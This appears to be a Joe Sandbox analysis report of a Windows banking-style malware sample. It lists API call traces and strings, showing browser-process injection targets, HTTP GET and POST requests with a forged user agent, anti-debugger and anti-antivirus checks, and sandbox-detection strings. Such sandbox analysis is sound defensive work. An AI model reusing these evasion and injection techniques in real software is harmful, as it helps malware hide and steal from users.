GetHandleInformation.KERNEL32(00000000,?), ref: 02D16914
CloseHandle.KERNEL32(00000000), ref: 02D16925
CreateThread.KERNEL32(00000000,00000000,02D17820,00000000,00000000,00000000), ref: 02D16954
GetHandleInformation.KERNEL32(00000000,?), ref: 02D16968
CloseHandle.KERNEL32(00000000), ref: 02D16979
CreateThread.KERNEL32(00000000,00000000,02D17B30,00000000,00000000,00000000), ref: 02D1698E
InitializeCriticalSection.KERNEL32(02D4FB80), ref: 02D1699F
CreateThread.KERNEL32(00000000,00000000,02D17430,00000000,00000000,00000000), ref: 02D169B0
GetHandleInformation.KERNEL32(00000000,?), ref: 02D169C4
FindCloseChangeNotification.KERNEL32(00000000), ref: 02D169D5
CreateThread.KERNEL32(00000000,00000000,02D16510,00000000,00000000,00000000), ref: 02D169EF
GetHandleInformation.KERNEL32(00000000,?), ref: 02D16A03
CloseHandle.KERNEL32(00000000), ref: 02D16A14
CreateThread.KERNEL32(00000000,00000000,02D15020,00000000,00000000,00000000), ref: 02D16A3E
GetHandleInformation.KERNEL32(00000000,?), ref: 02D16A52
CloseHandle.KERNEL32(00000000), ref: 02D16A63
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D16A72
HeapValidate.KERNEL32(00000000), ref: 02D16A75
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D16A82
HeapFree.KERNEL32(00000000), ref: 02D16A85
GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02D16AA9
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 02D16ABB
GetCurrentProcess.KERNEL32(00000000), ref: 02D16AC7

Part of subcall function 02D06A50: memset.MSVCRT ref: 02D06A81
Part of subcall function 02D06A50: memset.MSVCRT ref: 02D06A9F
Part of subcall function 02D06A50: RegOpenKeyExA.ADVAPI32(80000002,software\microsoft,00000000,00000101,?), ref: 02D06ABB
Part of subcall function 02D06A50: RegQueryValueExA.ADVAPI32(?,A3B7FE06a,00000000,00000001,?,00000104), ref: 02D06AE2
Part of subcall function 02D06A50: GetProcessHeap.KERNEL32(00000008,00000110,?,?), ref: 02D06B5A
Part of subcall function 02D06A50: HeapAlloc.KERNEL32(00000000), ref: 02D06B61
Part of subcall function 02D06A50: memset.MSVCRT ref: 02D06B75
Part of subcall function 02D06A50: lstrcpynA.KERNEL32(00000000,00000000,00000104), ref: 02D06B8E
Part of subcall function 02D06A50: RegCloseKey.ADVAPI32(?), ref: 02D06B9C

IsUserAnAdmin.SHELL32 ref: 02D16AD6
StrStrIA.SHLWAPI(?,\svchost.exe), ref: 02D16AF2
StrStrIA.SHLWAPI(?,\iexplore.exe), ref: 02D16B19
StrStrIA.SHLWAPI(?,\java.exe), ref: 02D16B2F
StrStrIA.SHLWAPI(?,\javaw.exe), ref: 02D16B45
StrStrIA.SHLWAPI(?,\javaws.exe), ref: 02D16B5B
StrStrIA.SHLWAPI(?,\opera.exe), ref: 02D16B71
StrStrIA.SHLWAPI(?,\firefox.exe), ref: 02D16B87
StrStrIA.SHLWAPI(?,\maxthon.exe), ref: 02D16B9D
StrStrIA.SHLWAPI(?,\avant.exe), ref: 02D16BB3
StrStrIA.SHLWAPI(?,\mnp.exe), ref: 02D16BC9
StrStrIA.SHLWAPI(?,\safari.exe), ref: 02D16BDF
StrStrIA.SHLWAPI(?,\netscape.exe), ref: 02D16BF5
StrStrIA.SHLWAPI(?,\tbb-firefox.exe), ref: 02D16C0B
StrStrIA.SHLWAPI(?,\frd.exe), ref: 02D16C21
StrStrIA.SHLWAPI(?,\chrome.exe), ref: 02D16C37
StrStrIA.SHLWAPI(?,\explorer.exe), ref: 02D16C4D
CreateThread.KERNEL32(00000000,00000000,02D1B3F0,00000000,00000000,00000000), ref: 02D16C7B
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D16C95
CloseHandle.KERNEL32(00000000), ref: 02D16CA2
CreateThread.KERNEL32(00000000,00000000,02D1EA80,00000000,00000000,00000000), ref: 02D16CB7
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D16CCB
CloseHandle.KERNEL32(00000000), ref: 02D16CD8
CreateThread.KERNEL32(00000000,00000000,02D20070,00000000,00000000,00000000), ref: 02D16CED
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D16D01
CloseHandle.KERNEL32(00000000), ref: 02D16D0E
CreateThread.KERNEL32(00000000,00000000,02D208E0,00000000,00000000,00000000), ref: 02D16D23
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D16D37
CloseHandle.KERNEL32(00000000), ref: 02D16D44
CreateThread.KERNEL32(00000000,00000000,02D1F1B0,00000000,00000000,00000000), ref: 02D16D59
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D16D6D
CloseHandle.KERNEL32(00000000), ref: 02D16D7A
CreateThread.KERNEL32(00000000,00000000,02D1C670,00000000,00000000,00000000), ref: 02D16D8F
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D16DA3
CloseHandle.KERNEL32(00000000), ref: 02D16DB0
CreateThread.KERNEL32(00000000,00000000,02D1C710,00000000,00000000,00000000), ref: 02D16DC5
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D16DD9
CloseHandle.KERNEL32(00000000), ref: 02D16DE6
CreateThread.KERNEL32(00000000,00000000,02D21060,00000000,00000000,00000000), ref: 02D16DFB
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D16E0F
CloseHandle.KERNEL32(00000000), ref: 02D16E1C
CreateThread.KERNEL32(00000000,00000000,02D220F0,00000000,00000000,00000000), ref: 02D16E31
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D16E45
CloseHandle.KERNEL32(00000000), ref: 02D16E52
CreateThread.KERNEL32(00000000,00000000,02D22DE0,00000000,00000000,00000000), ref: 02D16E67

Part of subcall function 02D1A240: CreateMutexA.KERNEL32(00000000,00000000,00000000,74E17390,?,?,02D16AFD), ref: 02D1A25A
Part of subcall function 02D1A240: CreateThread.KERNEL32(00000000,00000000,02D1A2B0,00000000,00000000,00000000), ref: 02D1A274
Part of subcall function 02D1A240: GetHandleInformation.KERNEL32(00000000,?,?,?,02D16AFD), ref: 02D1A28C
Part of subcall function 02D1A240: CloseHandle.KERNEL32(00000000,?,?,02D16AFD), ref: 02D1A29D

Part of subcall function 02D06070: IsUserAnAdmin.SHELL32 ref: 02D06070
Part of subcall function 02D06070: DnsFlushResolverCache.DNSAPI ref: 02D0607A
Part of subcall function 02D06070: LoadLibraryExA.KERNEL32(Dnsapi.dll,00000000,00000000,74E17390), ref: 02D0608A
Part of subcall function 02D06070: GetProcAddress.KERNEL32(00000000,DnsQuery_A), ref: 02D060A3
Part of subcall function 02D06070: GetProcAddress.KERNEL32(00000000,DnsQuery_UTF8), ref: 02D060BF
Part of subcall function 02D06070: GetProcAddress.KERNEL32(00000000,DnsQuery_W), ref: 02D060DB
Part of subcall function 02D06070: GetProcAddress.KERNEL32(00000000,Query_Main), ref: 02D060F7

GetCurrentProcessId.KERNEL32 ref: 02D1714F

Part of subcall function 02D24450: OpenProcess.KERNEL32(00000400,00000000,00000000,7591F550,00000000,76EDC3F0), ref: 02D24465
Part of subcall function 02D24450: OpenProcessToken.ADVAPI32(00000000,00000018,?,?,?,?,?,?,?,?,?,?,?,?,02D153C3), ref: 02D2447C
Part of subcall function 02D24450: GetTokenInformation.KERNELBASE(?,00000007(TokenIntegrityLevel),?,00000010,?), ref: 02D2449A
Part of subcall function 02D24450: CharUpperA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,02D153C3), ref: 02D244B2
Part of subcall function 02D24450: GetHandleInformation.KERNEL32(?,00000000), ref: 02D2450B
Part of subcall function 02D24450: FindCloseChangeNotification.KERNEL32(?), ref: 02D2451C
Part of subcall function 02D24450: GetHandleInformation.KERNEL32(00000000,?), ref: 02D2452E
Part of subcall function 02D24450: CloseHandle.KERNEL32(00000000), ref: 02D2453F

GetCurrentThreadId.KERNEL32 ref: 02D1715E
GetThreadDesktop.USER32(00000000,00000002,?,00000100,00000000), ref: 02D17177
GetUserObjectInformationA.USER32(00000000), ref: 02D1717E
lstrcmpiA.KERNEL32(?,a3b7feb4a), ref: 02D17194
CreateThread.KERNEL32(00000000,00000000,02D0BA40,00000000,00000000,00000000), ref: 02D171A8
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D171C0
CloseHandle.KERNEL32(00000000), ref: 02D171D1
CreateThread.KERNEL32(00000000,00000000,02D07D50,00000000,00000000,00000000), ref: 02D171E6
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D171FE
CloseHandle.KERNEL32(00000000), ref: 02D1720F

Part of subcall function 02D0D7A0: GetComputerNameA.KERNEL32(02D4F588,?), ref: 02D0D7B7
Part of subcall function 02D0D7A0: lstrlenA.KERNEL32(02D4F588,?,?,?,02D1714F), ref: 02D0D7C2
Part of subcall function 02D0D7A0: wsprintfA.USER32 ref: 02D0D802
Part of subcall function 02D0D7A0: wsprintfA.USER32 ref: 02D0D812
Part of subcall function 02D0D7A0: wsprintfA.USER32 ref: 02D0D822
Part of subcall function 02D0D7A0: wsprintfA.USER32 ref: 02D0D82F
Part of subcall function 02D0D7A0: wsprintfA.USER32 ref: 02D0D83C

Strings

A3B7FAF8a, xrefs: 02D16A1F
\intpro.exe, xrefs: 02D1707B
\iexplore.exe, xrefs: 02D16B0D
\safari.exe, xrefs: 02D16BD3
\cbsmain.dll, xrefs: 02D1708D
\javaws.exe, xrefs: 02D16B4F
\netscape.exe, xrefs: 02D16BE9
\mnp.exe, xrefs: 02D16BBD
ntdll.dll, xrefs: 02D17121
\frd.exe, xrefs: 02D16C15
a3b7feb4a, xrefs: 02D17188
\java.exe, xrefs: 02D16B23
\explorer.exe, xrefs: 02D16C41
\svchost.exe, xrefs: 02D16AE6
\avant.exe, xrefs: 02D16BA7
kernel32.dll, xrefs: 02D16A9D
\isclient.exe, xrefs: 02D17053
\notepad.exe, xrefs: 02D170D5
IsWow64Process, xrefs: 02D16AB5
--no-sandbox, xrefs: 02D16848
RtlFreeHeap, xrefs: 02D1711C
\ipc_full.exe, xrefs: 02D17069
\maxthon.exe, xrefs: 02D16B91
\rundll32.exe, xrefs: 02D170C3
\chrome.exe, xrefs: 02D1681F, 02D16C2B, 02D17131
\javaw.exe, xrefs: 02D16B39
\tbb-firefox.exe, xrefs: 02D16BFF
\core.exe, xrefs: 02D170B1
--no-sandbox, xrefs: 02D16889
C:\Users\user\AppData\Roaming\, xrefs: 02D167E3, 02D167F6
\opera.exe, xrefs: 02D16B65, 02D17100
\t, xrefs: 02D167FB
\clmain.exe, xrefs: 02D1709F
\firefox.exe, xrefs: 02D16B7B

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Handle$Information$CreateThread$Close$Process$Heap$AddressProcwsprintf$OpenPathmemset$CurrentUser$AdminBackslashChangeCommandCriticalFileFindInitializeLineModuleMutexNameNotificationQuerySectionTokenValueVolume_snprintf$AllocCacheCharComputerDesktopDirectoryEnvironmentExistsFlushFolderFreeLibraryLoadObjectResolverSystemUpperValidateVariableWindowslstrcmpilstrcpynlstrlen
String ID: --no-sandbox$ --no-sandbox$A3B7FAF8a$C:\Users\user\AppData\Roaming\$IsWow64Process$RtlFreeHeap$\avant.exe$\cbsmain.dll$\chrome.exe$\clmain.exe$\core.exe$\explorer.exe$\firefox.exe$\frd.exe$\iexplore.exe$\intpro.exe$\ipc_full.exe$\isclient.exe$\java.exe$\javaw.exe$\javaws.exe$\maxthon.exe$\mnp.exe$\netscape.exe$\notepad.exe$\opera.exe$\rundll32.exe$\safari.exe$\svchost.exe$\tbb-firefox.exe$a3b7feb4a$kernel32.dll$ntdll.dll$\t
API String ID: 1297835225-4257450245
Opcode ID: 438b8683ea3cf93c31803014bc5f62ac4e8d401534e669e9aff320e76e7839db
Instruction ID: 9dbde1a97bcd2b25711d4f8323745f3a1a403380b8ddfc1b614cab1de7b957a8
Opcode Fuzzy Hash: 438b8683ea3cf93c31803014bc5f62ac4e8d401534e669e9aff320e76e7839db
Instruction Fuzzy Hash: 3352C435A81315B7FB209BA1AC45FAE67ACAF04B44F644544FA05B67C4DBB0EE04CAE4

Function 02D14680 Relevance: 91.4, APIs: 44, Strings: 8, Instructions: 387
memorynetworkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 02D146BD
GetProcessHeap.KERNEL32(00000008,?,02D06C17,Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0),?), ref: 02D146F7
HeapAlloc.KERNEL32(00000000), ref: 02D146FE
memset.MSVCRT ref: 02D1470E
memcpy.MSVCRT ref: 02D1472D
InternetOpenA.WININET(?,00000000,00000000,00000000,04000000), ref: 02D14791
InternetConnectA.WININET(00000000,02D06C17,00000050,00000000,00000000,00000003,00000000,00000001), ref: 02D147B0
HttpOpenRequestA.WININET(?,GET,?,HTTP/1.0,00000000,00000000,00000000,00000001), ref: 02D147E8
HttpAddRequestHeadersA.WININET(00000000,Content-Type: application/x-www-form-urlencoded,000000FF,20000000), ref: 02D14819
HttpAddRequestHeadersA.WININET(?,Referer: http://www.google.com,000000FF,20000000), ref: 02D1482D
_snprintf.MSVCRT ref: 02D1484B
HttpAddRequestHeadersA.WININET(?,?,000000FF,20000000), ref: 02D14863
HttpSendRequestA.WININET(?,00000000,00000000,?,?), ref: 02D14879
HttpQueryInfoA.WININET(?,20000013,?,00000004,?), ref: 02D1489C
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 02D148D4
GetProcessHeap.KERNEL32(00000008,00001010), ref: 02D148F2
HeapAlloc.KERNEL32(00000000), ref: 02D148F5
memset.MSVCRT ref: 02D1490D
InternetReadFile.WININET(?,00000000,00001000,?), ref: 02D1492A
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D1494B
LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02D1495B
WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02D1496A
UnlockFile.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 02D1497A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D14983
HeapValidate.KERNEL32(00000000), ref: 02D1498A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D1499B
HeapFree.KERNEL32(00000000), ref: 02D149A2
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D149B0
HeapValidate.KERNEL32(00000000), ref: 02D149B3
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D149C0
HeapFree.KERNEL32(00000000), ref: 02D149C3
GetHandleInformation.KERNEL32(00000000,?), ref: 02D149D9
CloseHandle.KERNEL32(00000000), ref: 02D149EA
GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02D14A6F
HeapValidate.KERNEL32(00000000), ref: 02D14A72
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D14A7F
HeapFree.KERNEL32(00000000), ref: 02D14A82
GetProcessHeap.KERNEL32(00000000,?), ref: 02D14A9A
HeapValidate.KERNEL32(00000000), ref: 02D14A9D

Strings

Content-Type: application/x-www-form-urlencoded, xrefs: 02D14811
GET, xrefs: 02D147C4
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0), xrefs: 02D1468A
Content-Type: multipart/form-data; boundary=---------------------------%s, xrefs: 02D1483A
Referer: http://www.google.com, xrefs: 02D14827
HTTP/1.0, xrefs: 02D147E0
POST, xrefs: 02D147CD, 02D147E6
33b091295587945c, xrefs: 02D14835

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$FileHttp$Request$Validate$FreeHeadersInternetmemset$AllocHandleOpen$CloseConnectCreateInfoInformationLockPointerQueryReadSendUnlockWrite_snprintfmemcpy
String ID: 33b091295587945c$Content-Type: application/x-www-form-urlencoded$Content-Type: multipart/form-data; boundary=---------------------------%s$GET$HTTP/1.0$Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)$POST$Referer: http://www.google.com
API String ID: 912145775-1970990813
Opcode ID: 66f164afaec25c121a6c12b3906739bbaf31f7ff6dd0344b6283ee65732c0322
Instruction ID: ea2936747446e54a659eb7cb5bb30e9e9e369f7bcbb4a0150e82f854f9753205
Opcode Fuzzy Hash: 66f164afaec25c121a6c12b3906739bbaf31f7ff6dd0344b6283ee65732c0322
Instruction Fuzzy Hash: EED1B475A40255BBEB209FA5AC89FAF3BA8EF08718F154514FA05A73C0D770DD40CBA4

Function 00402B70 Relevance: 68.4, APIs: 30, Strings: 9, Instructions: 163
librarywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00401000: IsDebuggerPresent.KERNEL32 ref: 00401014
Part of subcall function 00401000: FindWindowA.USER32(OLLYDBG,00000000), ref: 0040102A
Part of subcall function 00401000: memset.MSVCRT ref: 0040104B
Part of subcall function 00401000: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00401056
Part of subcall function 00401000: Process32First.KERNEL32 ref: 00401071
Part of subcall function 00401000: StrStrIA.SHLWAPI(?,wireshark.exe), ref: 0040108D
Part of subcall function 00401000: Process32Next.KERNEL32(00000000,?), ref: 0040109D
Part of subcall function 00401000: GetHandleInformation.KERNEL32(00000000,00000000), ref: 004010B9
Part of subcall function 00401000: FindCloseChangeNotification.KERNEL32(00000000), ref: 004010CB
Part of subcall function 00401000: PathFileExistsA.SHLWAPI(\\?\globalroot\systemroot\system32\vmx_fb.dll,vmwaretray.exe,idag.exe,dumpcap.exe), ref: 00401104

LoadLibraryA.KERNEL32(user32.dll), ref: 00402B86
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00402B9A

Part of subcall function 00403920: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403953
Part of subcall function 00403920: strstr.MSVCRT ref: 00403967
Part of subcall function 00403920: GetUserNameA.ADVAPI32(?,00000104), ref: 0040398C
Part of subcall function 00403920: CharUpperA.USER32(?), ref: 00403999
Part of subcall function 00403920: strstr.MSVCRT ref: 004039AB
Part of subcall function 00403920: strstr.MSVCRT ref: 004039C4
Part of subcall function 00403920: strstr.MSVCRT ref: 004039DD
Part of subcall function 00403920: strstr.MSVCRT ref: 004039F6
Part of subcall function 00403920: strstr.MSVCRT ref: 00403A0F
Part of subcall function 00403920: GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403A28
Part of subcall function 00403920: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403A4C

ExitProcess.KERNEL32 ref: 00402BAB
FindWindowA.USER32(____AVP.Root,00000000), ref: 00402BC2
GetTickCount.KERNEL32 ref: 00402BCE
PostMessageA.USER32(00000000,00000466,00010001,00000000), ref: 00402BE0
IsUserAnAdmin.SHELL32 ref: 00402C00
ExitProcess.KERNEL32 ref: 00402C11

Strings

kernel32.dll, xrefs: 00402C19
Pnv, xrefs: 00402D2D, 00402D8F
\apppatch\, xrefs: 00402C5A, 00402CAA
IsWow64Process, xrefs: 00402C31
user32.dll, xrefs: 00402B81
____AVP.Root, xrefs: 00402BBD
winlogon.exe, xrefs: 00402D37, 00402D99
Tue Aug 2 12:53:17 20112, xrefs: 00402CCB, 00402CDF, 00402D02, 00402D12, 00402D64, 00402D74
explorer.exe, xrefs: 00402D3E, 00402D43, 00402DA0, 00402DA5

Memory Dump Source

Source File: 00000002.00000002.3269898642.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3269898642.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: strstr$FileFindName$ExitInformationModuleProcessProcess32UserWindow$AdminChangeCharCloseCountCreateDebuggerDirectoryExistsFirstHandleLibraryLoadMessageNextNotificationPathPostPresentSnapshotSystemTickToolhelp32UpperVolumeWindowsmemset
String ID: IsWow64Process$Pnv$Tue Aug 2 12:53:17 20112$\apppatch\$____AVP.Root$explorer.exe$kernel32.dll$user32.dll$winlogon.exe
API String ID: 9317432-1956477594
Opcode ID: b291367e78a862219a650f1c35e2dfbffcf1e089b291cbabdcdd32a92e30e4d6
Instruction ID: 39ff8b4b23ffe36b6a173c4f6bdc5339f36d51dfac64fa60dc4ffdda49012cd9
Opcode Fuzzy Hash: b291367e78a862219a650f1c35e2dfbffcf1e089b291cbabdcdd32a92e30e4d6
Instruction Fuzzy Hash: 8751A1B1600215ABEB107BF1EE0EB9E36686F84745F50013AFB01B61E1DBFC9C418A6D

Function 00403920 Relevance: 42.1, APIs: 15, Strings: 9, Instructions: 128
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403953
strstr.MSVCRT ref: 00403967

Part of subcall function 00403870: RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,y9@), ref: 0040389C
Part of subcall function 00403870: RegQueryValueExA.KERNEL32(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 004038C1
Part of subcall function 00403870: RegCloseKey.KERNEL32(y9@), ref: 004038CF

GetUserNameA.ADVAPI32(?,00000104), ref: 0040398C
CharUpperA.USER32(?), ref: 00403999
strstr.MSVCRT ref: 004039AB
strstr.MSVCRT ref: 004039C4
strstr.MSVCRT ref: 004039DD
strstr.MSVCRT ref: 004039F6
strstr.MSVCRT ref: 00403A0F
GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403A28
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403A4C
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403A86
StrStrIA.SHLWAPI(?,\sand-box\), ref: 00403A9A
StrStrIA.SHLWAPI(?,\cwsandbox\), ref: 00403AAC
StrStrIA.SHLWAPI(?,\sandbox\), ref: 00403ABE

Strings

MALNETVM, xrefs: 004039BE
\cwsandbox\, xrefs: 00403AA0
VIRUSCLONE, xrefs: 004039D7
Dave, xrefs: 00403A09
SANDBOX, xrefs: 004039A5
\sandbox\, xrefs: 00403AB2
test_item.exe, xrefs: 00403961
test user, xrefs: 004039F0
\sand-box\, xrefs: 00403A8E

Memory Dump Source

Source File: 00000002.00000002.3269898642.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3269898642.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: strstr$Name$FileModule$CharCloseDirectoryInformationOpenQuerySystemUpperUserValueVolumeWindows
String ID: Dave$MALNETVM$SANDBOX$VIRUSCLONE$\cwsandbox\$\sand-box\$\sandbox\$test user$test_item.exe
API String ID: 3012634381-649399103
Opcode ID: 98ae593a8036396cbb9844701f8c361d58fbeaa975e95f35afd36f7854fc9fb0
Instruction ID: 2772e22a84d8afe3dc88946ac3df406ee6e1198dc71f6cbec9561b14d5c35e9d
Opcode Fuzzy Hash: 98ae593a8036396cbb9844701f8c361d58fbeaa975e95f35afd36f7854fc9fb0
Instruction Fuzzy Hash: 0341CA71A5031866DF20DB608D85FEB7B6CAF54B05F0C05BAE644F51D0E6F89B848F94

Function 02D17430 Relevance: 40.8, APIs: 27, Instructions: 286
memorytimesleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02D17300: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02D17314
Part of subcall function 02D17300: Process32First.KERNEL32(00000000,?), ref: 02D17339
Part of subcall function 02D17300: GetCurrentProcessId.KERNEL32(?,00000000), ref: 02D1735D
Part of subcall function 02D17300: StrStrIA.SHLWAPI(iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex,?,?,00000000), ref: 02D17377
Part of subcall function 02D17300: EnterCriticalSection.KERNEL32(02D4FB80,?,00000000), ref: 02D1739B
Part of subcall function 02D17300: GetProcessHeap.KERNEL32(00000008,00000010,?,00000000), ref: 02D173A1
Part of subcall function 02D17300: HeapAlloc.KERNEL32(00000000,?,00000000), ref: 02D173A8
Part of subcall function 02D17300: LeaveCriticalSection.KERNEL32(02D4FB80,?,00000000), ref: 02D173D7
Part of subcall function 02D17300: Process32Next.KERNEL32(00000000,00000128), ref: 02D173EB
Part of subcall function 02D17300: GetHandleInformation.KERNEL32(00000000,?,?,00000000), ref: 02D17405
Part of subcall function 02D17300: CloseHandle.KERNEL32(00000000,?,00000000), ref: 02D17416

OpenProcess.KERNEL32(00000400,00000000,000020FC), ref: 02D17494
GetProcessTimes.KERNEL32(00000000,?,?,?,?), ref: 02D174B8
GetHandleInformation.KERNEL32(00000000,?), ref: 02D174E2
CloseHandle.KERNEL32(00000000), ref: 02D174F4
EnterCriticalSection.KERNEL32(02D4FB80), ref: 02D174FF
LeaveCriticalSection.KERNEL32(02D4FB80), ref: 02D17524
OpenProcess.KERNEL32(00000400,00000000,?), ref: 02D1758B
GetProcessTimes.KERNEL32(00000000,?,?,?,?), ref: 02D175AC
GetHandleInformation.KERNEL32(00000000,?), ref: 02D175D0
CloseHandle.KERNEL32(00000000), ref: 02D175E2
EnterCriticalSection.KERNEL32(02D4FB80), ref: 02D175ED
LeaveCriticalSection.KERNEL32(02D4FB80), ref: 02D17618
VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D17666
VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D176B1
EnterCriticalSection.KERNEL32(02D4FB80,?,?), ref: 02D176F0
GetProcessHeap.KERNEL32(00000008,00000010), ref: 02D176FA
HeapAlloc.KERNEL32(00000000), ref: 02D17701
Sleep.KERNEL32(00000032), ref: 02D17815

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: CriticalProcessSection$Handle$EnterHeap$CloseInformationLeave$AllocOpenProcess32QueryTimesVirtual$CreateCurrentFirstNextSleepSnapshotToolhelp32
String ID:
API String ID: 87146162-0
Opcode ID: 38d2246aae289d4ed3ec2acb2a38b45667d6d6227ca407ca5565fe135f722a88
Instruction ID: fdc3f23567de1ace32b5a8548bfd85c860747fd8ff6f7e315e3074c6efb64f11
Opcode Fuzzy Hash: 38d2246aae289d4ed3ec2acb2a38b45667d6d6227ca407ca5565fe135f722a88
Instruction Fuzzy Hash: B9C105B5A48350AFE320CF64E484A5BFBE9BF89B44F54891EF58987710D7709904CF92

Function 00401B70 Relevance: 40.5, APIs: 21, Strings: 2, Instructions: 215
injectionlibrarymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00401FB0: memset.MSVCRT ref: 00401FD6
Part of subcall function 00401FB0: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401FE7
Part of subcall function 00401FB0: GetLastError.KERNEL32 ref: 00401FF0
Part of subcall function 00401FB0: SwitchToThread.KERNEL32 ref: 00401FFF
Part of subcall function 00401FB0: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00402008
Part of subcall function 00401FB0: GetHandleInformation.KERNEL32(00000000,00000000), ref: 00402028
Part of subcall function 00401FB0: FindCloseChangeNotification.KERNEL32(00000000), ref: 00402039

Sleep.KERNEL32(00000064,755CDB30,?,00000000,00402DB4,winlogon.exe), ref: 00401B9D
OpenProcess.KERNEL32(001F0FFF,00000000,00000000,755CDB30,?,00000000,00402DB4,winlogon.exe), ref: 00401BBC
GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00401BDB
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00401BF1
GetCurrentProcess.KERNEL32(00000000), ref: 00401BFD
GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00401C18
